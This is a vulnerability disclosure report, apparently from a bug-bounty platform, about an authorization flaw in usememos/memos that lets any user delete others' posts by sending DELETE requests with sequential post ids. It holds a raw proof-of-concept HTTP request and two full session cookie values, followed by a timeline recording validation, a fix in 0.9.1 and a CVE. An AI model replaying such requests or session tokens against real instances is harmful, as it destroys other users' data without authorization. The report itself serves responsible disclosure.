An user can delete other user's post in usememos/memos

Valid

Reported on

Dec 26th 2022


Description

As the title, an attacker can delete other user's post via post id (can be bruteforce)

Here is video poc: https://drive.google.com/file/d/18QucWYwkpO9kVPMqNzSQ-ptwrZGk-UP9/view?usp=share_link

Proof of Concept

DELETE /api/memo/$1026$ HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MjAyMzkzNnxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUk9fMqNUegFqgfGemADcwgQYFDYFrRl2lsWdeCjjKUx_uEW
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

The id 1026 is the post ID, when user create a post, the id increase 1 unit, so attacker can be delete other user's post via this id and request DELETE

Here is the session id with each account:

attacker session id memos_session=MTY3MjAyMzkzNnxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUk9fMqNUegFqgfGemADcwgQYFDYFrRl2lsWdeCjjKUx_uEW

User demo session id: memos_session=MTY3MjAyMzI4MXxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUE9fP5tDVSp1CxdxPlf5c_7FWcF5Yb5SFR7POch2HJbm_WD

Impact

This vulnerability impact all of the user

We are processing your report and will contact the usememos/memos team within 24 hours. 5 months ago
Nguyen Minh Quang modified the report
5 months ago
Nguyen Minh Quang modified the report
5 months ago
We have contacted a member of the usememos/memos team and are waiting to hear back 4 months ago
Nguyen Minh Quang modified the report
4 months ago
STEVEN validated this vulnerability 4 months ago
Nguyen Minh Quang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.1 with commit 3556ae 4 months ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 4 months ago
to join this conversation